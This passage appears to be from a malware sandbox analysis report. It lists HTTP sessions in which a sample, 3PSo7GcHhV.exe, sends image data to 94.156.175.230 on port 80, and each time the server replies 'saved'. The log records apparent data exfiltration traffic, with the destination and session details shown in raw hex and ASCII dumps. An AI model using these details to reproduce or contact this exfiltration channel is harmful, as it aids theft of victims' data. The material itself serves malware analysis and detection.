                                                                  May 28, 2021 13:00:06.958257914 CEST1661OUTData Raw: 00 e8 62 b2 cd 5c d2 ec 75 3b fb d5 4d 26 d2 f2 e6 ea 21 e6 81 69 13 3b a6 08 f9 be 51 91 83 8e 7e 94 3d 81 6e 7d 11 af 78 76 ff 00 c4 de 3f 9a d2 f6 69 61 d3 a1 b7 12 40 ca 32 08 c0 07 6f 6c ee 3c fb 01 ed 5c 8f c5 b9 9f 41 5f 0d d9 32 89 8c 56
                                                                  Data Ascii: b\u;M&!i;Q~=n}xv?ia@2ol<\A_2VF&l;v>#R`3yNEP6go!}+M%-sqifk7E`-CPi'VEMJTZ'XhceW)*O@N>:f43au~]*I;7_7j6
                                                                  May 28, 2021 13:00:06.958300114 CEST1666OUTData Raw: f8 52 8f 0e eb aa c1 86 8f a9 02 0e 41 16 af c7 e9 5e fb a1 87 74 bd 9d d7 7f 99 f3 ca be 21 55 f6 96 7d be 47 a5 78 7b c4 eb e2 18 b4 45 9d 80 bf b7 bc 2b 32 f4 dd fe 8f 36 18 7d 7b fb fe 15 e4 9f 1a ff 00 e4 a2 cd ff 00 5e d1 7f 2a ed 3c 19 a4
                                                                  Data Ascii: RA^t!U}Gx{E+26}{^*<xL3#I,02O\W(_|M8S%Ok~0'SM#(\PRLG`grYA($2{;CrWzV}~o-T38nD
                                                                  May 28, 2021 13:00:06.958334923 CEST1671OUTData Raw: 88 46 85 f6 41 99 18 12 42 91 92 ab 8e b8 3d 2b ce c8 c8 c5 68 dc 78 83 5e bb 68 1e e7 5e d5 27 6b 77 f3 20 69 2e e4 63 13 7f 79 49 3c 1f 71 59 55 8c a4 d3 8f 4b fe 36 fc 8d 69 ca 29 34 ce aa f6 d3 4d ba d0 f4 7b e7 b7 d4 97 4e b3 d1 65 bb 16 be
                                                                  Data Ascii: FAB=+hx^h^'kw i.cyI<qYUK6i)4M{NebP<v<H|+Y/n.x,e2Hq`?xwltuG\8cRhfM'29UcwwI,i{"E,pV*5S}6\4Q[|VFXWz`
                                                                  May 28, 2021 13:00:06.958369970 CEST1674OUTData Raw: 4e 6b 2c 31 a7 89 2b 39 53 4c 4b 9a 3b 33 a2 82 fd 1f 86 23 f1 ab aa b6 b3 0c bc 6a 7e 95 ca 2c b5 62 2b 99 41 f9 37 1f a5 72 d4 c3 f5 4e c7 55 3c 53 5a 4d 5c ea 53 4c b5 7f f5 67 6f b5 48 34 72 47 40 c2 b1 6d ef 2e c7 fc b2 6c 7a 9e 2b 5a df 52
                                                                  Data Ascii: Nk,1+9SLK;3#j~,b+A7rNU<SZM\SLgoH4rG@m.lz+ZRt|jfz4jal+~9Gex5IdzWQ>iU5uu9@>jWXc`:,kVqRUw6jB%S:KzWGLy+ky
                                                                  May 28, 2021 13:00:06.958403111 CEST1677OUTData Raw: ab 6a d7 7f c2 ef 5f ba df 71 d2 9d 2d 13 fe bf af d4 9a 4d 1f 4d b0 b6 37 b7 f2 dd 34 36 f6 f6 de 7c 11 32 ac 92 5c 4e 8d 22 a2 b1 04 22 84 00 92 43 1c 8c 63 9e 2b c3 06 8f 24 17 9a bc 8b 7f 1e 99 6e d1 c4 b6 be 6a 34 f2 4a e1 88 51 26 d0 02 e1
                                                                  Data Ascii: j_q-MM746|2\N""Cc+$nj4JQ&l=iVP4?O5sxsi%yR05ZI-nY;dYvm703;}yoKZh4op]d(f_OfCDQu lHTHY2;
                                                                  May 28, 2021 13:00:07.022877932 CEST1682OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:07.022958040 CEST1688OUTData Raw: fc 79 a9 49 ab fc 18 b5 bd 98 e6 59 26 8d 5c fa b2 b3 29 3f 89 19 af 0a 35 ee 9e 3d d3 64 d2 3e 0c 5a d9 4c 31 2a 4d 19 71 e8 cc cc c4 7e 04 e2 bc 2a aa 8f 2d e7 c9 b5 dd 85 53 9b 96 1c fb d9 5c 5a 29 29 6b 63 20 ed 45 2f 6a 43 40 82 81 45 28 a0
                                                                  Data Ascii: yIY&\)?5=d>ZL1*Mq~*-S\Z))kc E/jC@E(%-0KH(BIGz`(J(&::2X)b(Lp,pD))i2SD)HRZpL.i3J)}(MNhiQ>8&n8Sd5I\4
                                                                  May 28, 2021 13:00:07.022981882 CEST1693OUTData Raw: bf 8a b8 b0 7f c2 97 ab 3e 92 ae b3 8f a2 3d 9a f3 8f 0c 69 00 7f cf 21 fc ab 1f bd 6c ea 1c 78 7b 48 1f f4 c8 7f 2a c6 35 c9 85 f8 3e 6c ac 77 f1 7e 42 d1 8a 4c d1 9a e9 39 2e 3b bd 3a 98 0d 3c 52 29 07 34 e1 49 4b 52 52 1d 9a 75 37 3c 52 83 49
                                                                  Data Ascii: >=i!lx{H*5>lw~BL9.;:<R)4IKRRu7<RIN:SK4C:jYhp(hONH)<sRBN(NVS_zA]AZE^Q@IYg1RSIz\fv~TLDuF8KA
                                                                  May 28, 2021 13:00:07.153971910 CEST1745INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.34995694.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:07.508189917 CEST1759OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 c5 a5 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:07.574379921 CEST1775OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:07.574481010 CEST1785OUTData Raw: 88 46 85 f6 41 99 18 12 42 91 92 ab 8e b8 3d 2b ce c8 c8 c5 68 dc 78 83 5e bb 68 1e e7 5e d5 27 6b 77 f3 20 69 2e e4 63 13 7f 79 49 3c 1f 71 59 55 8c a4 d3 8f 4b fe 36 fc 8d 69 ca 29 34 ce aa f6 d3 4d ba d0 f4 7b e7 b7 d4 97 4e b3 d1 65 bb 16 be
                                                                  Data Ascii: FAB=+hx^h^'kw i.cyI<qYUK6i)4M{NebP<v<H|+Y/n.x,e2Hq`?xwltuG\8cRhfM'29UcwwI,i{"E,pV*5S}6\4Q[|VFXWz`
                                                                  May 28, 2021 13:00:07.638900042 CEST1791OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:07.638948917 CEST1794OUTData Raw: fc 79 a9 49 ab fc 18 b5 bd 98 e6 59 26 8d 5c fa b2 b3 29 3f 89 19 af 0a 35 ee 9e 3d d3 64 d2 3e 0c 5a d9 4c 31 2a 4d 19 71 e8 cc cc c4 7e 04 e2 bc 2a aa 8f 2d e7 c9 b5 dd 85 53 9b 96 1c fb d9 5c 5a 29 29 6b 63 20 ed 45 2f 6a 43 40 82 81 45 28 a0
                                                                  Data Ascii: yIY&\)?5=d>ZL1*Mq~*-S\Z))kc E/jC@E(%-0KH(BIGz`(J(&::2X)b(Lp,pD))i2SD)HRZpL.i3J)}(MNhiQ>8&n8Sd5I\4
                                                                  May 28, 2021 13:00:07.638962984 CEST1796OUTData Raw: 2c 3a 8d 9d f4 72 26 f1 2d a9 7c 0e 48 c1 0e aa c0 f1 dc 74 22 b5 4e a9 a6 cd aa 6b 16 0d 74 63 d2 ee 6c 93 4f b5 ba 11 36 d8 c4 6e 8c 8e ca 06 ed ac c8 4b 70 4f ce 4e 09 e2 b4 62 d7 34 9b 5b 8b 78 6d f5 0b 1b 6d 45 74 a7 b7 1a cd 95 93 45 14 53
                                                                  Data Ascii: ,:r&-|Ht"NktclO6nKpONb4[xmmEtESw+acWyeni{iwo?e4:x'vUbqc;eg6im]DpyiM58M@sO4VBH872U@x7WuZhO-0Q0U}0sJZ
                                                                  May 28, 2021 13:00:07.639024019 CEST1804OUTData Raw: bf 8a b8 b0 7f c2 97 ab 3e 92 ae b3 8f a2 3d 9a f3 8f 0c 69 00 7f cf 21 fc ab 1f bd 6c ea 1c 78 7b 48 1f f4 c8 7f 2a c6 35 c9 85 f8 3e 6c ac 77 f1 7e 42 d1 8a 4c d1 9a e9 39 2e 3b bd 3a 98 0d 3c 52 29 07 34 e1 49 4b 52 52 1d 9a 75 37 3c 52 83 49
                                                                  Data Ascii: >=i!lx{H*5>lw~BL9.;:<R)4IKRRu7<RIN:SK4C:jYhp(hONH)<sRBN(NVS_zA]AZE^Q@IYg1RSIz\fv~TLDuF8KA
                                                                  May 28, 2021 13:00:07.639060974 CEST1810OUTData Raw: d2 53 6d 76 6d 7f 4f e6 1f 19 40 5f 87 ae 00 00 0b a8 80 03 f1 af 9d 6b d7 fe 22 7c 45 d0 3c 4f e1 37 d3 b4 e9 2e 3e d1 e7 24 80 4b 0e d0 40 ce 79 cf bd 79 08 ae 8c 24 5c 60 ee ba 98 e2 a4 9c d5 bb 05 34 8a 75 25 74 b3 9c 6e 29 31 4e 34 95 23 03
                                                                  Data Ascii: SmvmO@_k"|E<O7.>$K@yy$\`4u%tn)1N4#J99z:KUbtIKT H)c-&hVHqK(E0QMu(U>wjcQK@8u4K\P(&SZR0i(@hXN4R9D1`QSMZ/
                                                                  May 28, 2021 13:00:07.639126062 CEST1815OUTData Raw: f7 a7 76 a4 52 17 1c 1a f2 0f 89 3f f2 12 b3 ff 00 ae 27 ff 00 42 35 ec 1f c3 5e 3b f1 1c ff 00 c4 ce d3 fe b8 9f fd 08 d6 b4 37 33 ab ba 3c 9e 83 49 de 8a e5 3d 31 45 2d 77 df 07 21 8e 7f 1e 2c 72 c6 ae 86 da 4c 86 19 1d ab df 67 b1 d3 ed 76 96
                                                                  Data Ascii: vR?'B5^;73<I=1E-w!,rLgvD?y>|F9oWV7LImp"uY-;|'Lq\t}nF^>SqopPq\zI]M4)ZQEK
                                                                  May 28, 2021 13:00:07.639183044 CEST1818OUTData Raw: 1f 79 95 54 15 3e 88 c3 b8 af 15 d5 4a 5c bf d6 d7 3e 9a 34 9b 8d ff 00 ae df d7 fc 39 c5 53 d6 49 11 5d 55 d9 55 c6 18 03 c3 0c e7 9f 5e 40 af 4e b7 f0 ca 4b e2 cf 12 4b 1f 87 a4 bc b1 7d 4f fb 2e 34 b6 b4 2e b6 aa f9 2f 28 0a 30 a5 06 dc 1e db
                                                                  Data Ascii: yT>J\>49SI]UU^@NKK}O.4./(09Z+QL/i8Q*5%o|;!Vu[Pogxcy*d]aqebjmqaXN'8WHntMQ+e9vp
                                                                  May 28, 2021 13:00:07.768846035 CEST1855INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.34995894.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:08.329590082 CEST1870OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 c5 a5 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:08.394325972 CEST1896OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:08.460287094 CEST1909OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:08.460375071 CEST1935OUTData Raw: 2c 3a 8d 9d f4 72 26 f1 2d a9 7c 0e 48 c1 0e aa c0 f1 dc 74 22 b5 4e a9 a6 cd aa 6b 16 0d 74 63 d2 ee 6c 93 4f b5 ba 11 36 d8 c4 6e 8c 8e ca 06 ed ac c8 4b 70 4f ce 4e 09 e2 b4 62 d7 34 9b 5b 8b 78 6d f5 0b 1b 6d 45 74 a7 b7 1a cd 95 93 45 14 53
                                                                  Data Ascii: ,:r&-|Ht"NktclO6nKpONb4[xmmEtESw+acWyeni{iwo?e4:x'vUbqc;eg6im]DpyiM58M@sO4VBH872U@x7WuZhO-0Q0U}0sJZ
                                                                  May 28, 2021 13:00:08.460421085 CEST1938OUTData Raw: 4a 09 3d cd 2f 6e 3f ab 2e ac da 37 91 0f e2 a6 1b f8 fb 64 d6 4e 4d 28 cd 1e d9 87 b0 89 a7 fd a1 e8 b4 86 fd cf 41 59 e0 d3 85 1e d2 4c 3d 8c 11 73 ed 92 1e f4 86 e2 43 fc 47 f3 aa c2 94 1a 7c ec 39 22 4f e6 31 ea c6 8d c4 f7 a8 81 a7 0a 77 13
                                                                  Data Ascii: J=/n?.7dNM(AYL=sCG|9"O1wHvj:]IbPi;wsX5[I.F[7y<zzC%VF\~RWJaQn5.aBJ;5jPO)(41X~h0\+bJ3Lzw)sQ
                                                                  May 28, 2021 13:00:08.460464954 CEST1943OUTData Raw: 03 1c d7 a8 ea 36 b0 b6 a9 76 c6 fe dd 49 99 c9 52 b2 64 7c c7 8e 16 b8 ee ca 8d 5a 92 ba 93 db e4 4f 79 0e af 1e a7 7a d6 b0 de 47 1c 93 b3 7e e1 19 55 bb 6e f9 78 27 00 73 de bc df e3 a5 84 56 f1 78 62 ec c6 e2 f2 e2 09 56 79 24 66 66 6d a2 32
                                                                  Data Ascii: 6vIRd|ZOyzG~Unx'sVxbVy$ffm2s^u&g%J8Z;_0`!am_<Z%zFB(z?+\-rq?Zj4o8t0\g0 |fq
                                                                  May 28, 2021 13:00:08.460803032 CEST1946OUTData Raw: 98 58 22 83 c8 c0 01 47 d4 d7 33 45 4f b2 8f f5 f3 ff 00 36 3f 6a ff 00 af eb c8 db bf f1 1c 77 56 1a 85 bd b6 98 2c e5 bf 9a de e2 67 8a 6f 91 65 8f 7e e6 44 da 36 86 2f 9d b9 f9 48 38 e0 80 2d 6a be 2a b1 d7 e6 b0 7d 57 44 97 36 b6 c6 36 6b 2b
                                                                  Data Ascii: X"G3EO6?jwV,goe~D6/H8-j*}WD66k+I1Y<:W5E? ud6Mh\%`H/LbWb0D$r3\q>fXUz*N1w_a96Nj:}`d1YEIYN4
                                                                  May 28, 2021 13:00:08.460836887 CEST1949OUTData Raw: f4 c4 02 96 92 96 98 87 0a 5c d3 01 a7 53 10 a4 d2 8a 4a 29 88 75 14 99 a2 81 0b 4b 49 45 3b 80 b4 99 a2 8a 2e 01 9a 70 34 da 33 40 87 83 4e 06 98 0d 28 35 48 43 c7 5a 5c d3 41 a2 a8 91 d4 03 4d a5 06 80 1d 9a 33 49 9a 28 b8 87 03 4e a8 e9 73 55
                                                                  Data Ascii: \SJ)uKIE;.p43@N(5HCZ\AM3I(NsUqXp54d~i`aj\ aN*w]irl;4aRfLBM(4\,H;582Zs@4+f54qXT{Qp=Q%F}s0F_Z
                                                                  May 28, 2021 13:00:08.461277008 CEST1954OUTData Raw: 01 d4 53 69 73 40 58 5a 5a 6d 2d 31 0a 68 a4 a5 14 00 51 de 8a 29 80 b4 52 50 3a d0 03 a8 a3 bd 25 31 0e a5 14 da 5a 04 3a 94 1a 6e 68 06 98 89 29 29 05 2d 51 21 d2 8a 4c d2 d0 02 8a 5c d3 69 41 a7 71 0f 06 8c d3 33 4b 9a 77 0b 0b 4b d2 9b 9a 5e
                                                                  Data Ascii: Sis@XZZm-1hQ)RP:%1Z:nh))-Q!L\iAq3KwK^hfnh.Q."p j3M-fuuZaaE;4\3MqN&hF.if54H(54Iz+{EbLfh&4r=.a
                                                                  May 28, 2021 13:00:08.527196884 CEST1967OUTData Raw: 01 73 4b 4d a5 a7 71 0b 45 25 14 00 ec d1 9a 6d 04 d0 16 1f 9a 3b 53 33 4a 0d 3b 85 87 66 8c d3 49 a4 cd 17 15 89 33 46 6a 3c d2 e6 8b 85 87 66 8c d3 49 a3 34 05 87 e6 8c d3 73 46 68 b8 58 76 68 cd 33 34 13 45 c2 c3 89 a4 cd 37 34 66 8b 85 87 e6
                                                                  Data Ascii: sKMqE%m;S3J;fI3Fj<fI4sFhXvh34E74fsFhX~h34fyni3EFi;3IL4Rff4psM&i\vM.h&LquR(4f4J~hZ)(fERQ.KI;V+c~
                                                                  May 28, 2021 13:00:08.592165947 CEST1969INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  8192.168.2.34995994.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:09.092113972 CEST1990OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 c5 a5 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:09.158401966 CEST2006OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:09.158504963 CEST2017OUTData Raw: 88 46 85 f6 41 99 18 12 42 91 92 ab 8e b8 3d 2b ce c8 c8 c5 68 dc 78 83 5e bb 68 1e e7 5e d5 27 6b 77 f3 20 69 2e e4 63 13 7f 79 49 3c 1f 71 59 55 8c a4 d3 8f 4b fe 36 fc 8d 69 ca 29 34 ce aa f6 d3 4d ba d0 f4 7b e7 b7 d4 97 4e b3 d1 65 bb 16 be
                                                                  Data Ascii: FAB=+hx^h^'kw i.cyI<qYUK6i)4M{NebP<v<H|+Y/n.x,e2Hq`?xwltuG\8cRhfM'29UcwwI,i{"E,pV*5S}6\4Q[|VFXWz`
                                                                  May 28, 2021 13:00:09.224539042 CEST2030OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:09.224585056 CEST2033OUTData Raw: 96 8f 20 fc d4 11 53 2e a9 6b ae 41 14 da 35 cd bd d3 43 2e f6 43 21 42 01 56 5e 78 24 75 f4 a5 27 88 8a e6 92 69 7a 0a 2f 0f 29 72 c5 a6 fd 4f 90 ef ad ae f4 db d9 6c ef 22 78 6e 22 6d ae 8c 39 06 ab f9 ad eb 5e ed f1 9b c3 cb 27 87 5b 5c ba b2
                                                                  Data Ascii: S.kA5C.C!BV^x$u'iz/)rOl"xn"m9^'[\]#YapadusW35bO5[WvM5hZ(5hIadK7szY9Q h4s0Dhapi}P(cEr\'%7joz@A]5V
                                                                  May 28, 2021 13:00:09.225301027 CEST2062OUTData Raw: a4 45 a9 c1 a8 c6 55 59 c0 63 11 23 9e 3b 7f fa ab 77 45 b4 7f 0a 78 0e 41 a8 b2 ab c5 1c 92 ba 83 f7 49 e8 b9 f5 e8 3e a6 b5 71 a7 08 c6 71 7c cd db 46 ef 7b f9 6f a3 ee 62 a5 52 72 94 24 b9 52 be a9 5a d6 f3 db 55 d8 e5 fe 2a ea 49 ab fc 1e 4d
                                                                  Data Ascii: EUYc#;wExAI>qq|F{obRr$RZU*IMAhhX~~vAG;0+VQl7n+R!jI$4Tfj>XsDGF>xVQh$.x_dozO5GZ_bo_i\R45Wa{X)b
                                                                  May 28, 2021 13:00:09.225405931 CEST2070OUTData Raw: f4 c4 02 96 92 96 98 87 0a 5c d3 01 a7 53 10 a4 d2 8a 4a 29 88 75 14 99 a2 81 0b 4b 49 45 3b 80 b4 99 a2 8a 2e 01 9a 70 34 da 33 40 87 83 4e 06 98 0d 28 35 48 43 c7 5a 5c d3 41 a2 a8 91 d4 03 4d a5 06 80 1d 9a 33 49 9a 28 b8 87 03 4e a8 e9 73 55
                                                                  Data Ascii: \SJ)uKIE;.p43@N(5HCZ\AM3I(NsUqXp54d~i`aj\ aN*w]irl;4aRfLBM(4\,H;582Zs@4+f54qXT{Qp=Q%F}s0F_Z
                                                                  May 28, 2021 13:00:09.289275885 CEST2081OUTData Raw: 01 73 4b 4d a5 a7 71 0b 45 25 14 00 ec d1 9a 6d 04 d0 16 1f 9a 3b 53 33 4a 0d 3b 85 87 66 8c d3 49 a4 cd 17 15 89 33 46 6a 3c d2 e6 8b 85 87 66 8c d3 49 a3 34 05 87 e6 8c d3 73 46 68 b8 58 76 68 cd 33 34 13 45 c2 c3 89 a4 cd 37 34 66 8b 85 87 e6
                                                                  Data Ascii: sKMqE%m;S3J;fI3Fj<fI4sFhXvh34E74fsFhX~h34fyni3EFi;3IL4Rff4psM&i\vM.h&LquR(4f4J~hZ)(fERQ.KI;V+c~
                                                                  May 28, 2021 13:00:09.289417028 CEST2085OUTData Raw: 5f c2 b8 f1 d8 79 e1 30 4b 1a a7 77 7d 8f 6e 96 6d 43 15 55 e1 e1 49 72 5b 47 fd 6c 7c ab 73 6d 2d 9d d4 b6 d7 08 63 9a 26 28 ea 7a 82 2a 2a ea fe 25 79 3f f0 b0 75 5f 27 1b 77 ae 71 fd ed 8b bb f5 cd 72 75 d5 46 a3 a9 4a 33 7d 52 67 97 38 f2 c9
                                                                  Data Ascii: _y0Kw}nmCUIr[Gl|sm-c&(z**%y?u_'wqruFJ3}Rg8QKZPuI@RIE-Q@-%)h%-%-%-wJZ(%PQKE))iRRPRPEPE)((iL:IaZK3|Fs^}~`
                                                                  May 28, 2021 13:00:09.356054068 CEST2086INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  9192.168.2.34996194.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:10.481363058 CEST2112OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 50 a6 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pPJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:10.545845032 CEST2115OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:10.545893908 CEST2117OUTData Raw: 00 e8 62 b2 cd 5c d2 ec 75 3b fb d5 4d 26 d2 f2 e6 ea 21 e6 81 69 13 3b a6 08 f9 be 51 91 83 8e 7e 94 3d 81 6e 7d 11 af 78 76 ff 00 c4 de 3f 9a d2 f6 69 61 d3 a1 b7 12 40 ca 32 08 c0 07 6f 6c ee 3c fb 01 ed 5c 8f c5 b9 9f 41 5f 0d d9 32 89 8c 56
                                                                  Data Ascii: b\u;M&!i;Q~=n}xv?ia@2ol<\A_2VF&l;v>#R`3yNEP6go!}+M%-sqifk7E`-CPi'VEMJTZ'XhceW)*O@N>:f43au~]*I;7_7j6
                                                                  May 28, 2021 13:00:10.545907974 CEST2120OUTData Raw: df fa bd ff 00 af f8 25 2a d1 da df d5 ac 68 cf a2 6a 36 b6 8f 75 35 b1 48 11 20 76 6d ea 70 26 52 d1 9c 03 9e 40 27 db be 2a 85 34 44 a0 e4 66 9f 5d 0a fd 4e 77 6e 83 4f 43 5d dc 96 9a 0d b5 bd cc 7f d8 11 cb 2d a6 83 6d a9 f9 af 75 37 ef 65 71
                                                                  Data Ascii: %*hj6u5H vmp&R@'*4Df]NwnOC]-mu7eqe`GQ)QR2]%y+:ZK[n^<ddGyRuh7Rm2{MfX;(XTndq>JzRtwxc&TzPKwHK)7n/o@Wv0
                                                                  May 28, 2021 13:00:10.545931101 CEST2123OUTData Raw: 8a 62 16 8e d4 52 d0 02 52 f4 ad 1d 1b 46 ba d6 ef 96 d6 d5 49 76 20 70 32 72 7a 00 3d 6b b7 1f 05 fc 4f d7 c9 ff 00 c7 a3 ff 00 e2 eb 19 e2 69 42 5c b2 7a fa 37 f9 23 b2 96 5f 88 ab 4d 54 8a 49 3d af 28 c6 fe 97 6a e7 9b e2 80 2b d2 3f e1 4b f8
                                                                  Data Ascii: bRRFIv p2rz=kOiB\z7#_MTI=(j+?Kxu/YZUN+|T}vw?5YV%8GI42[J]N5t<FQE1A4%QHb)iq@RPZCK@KIQE/j((QKE0Z))(Z(
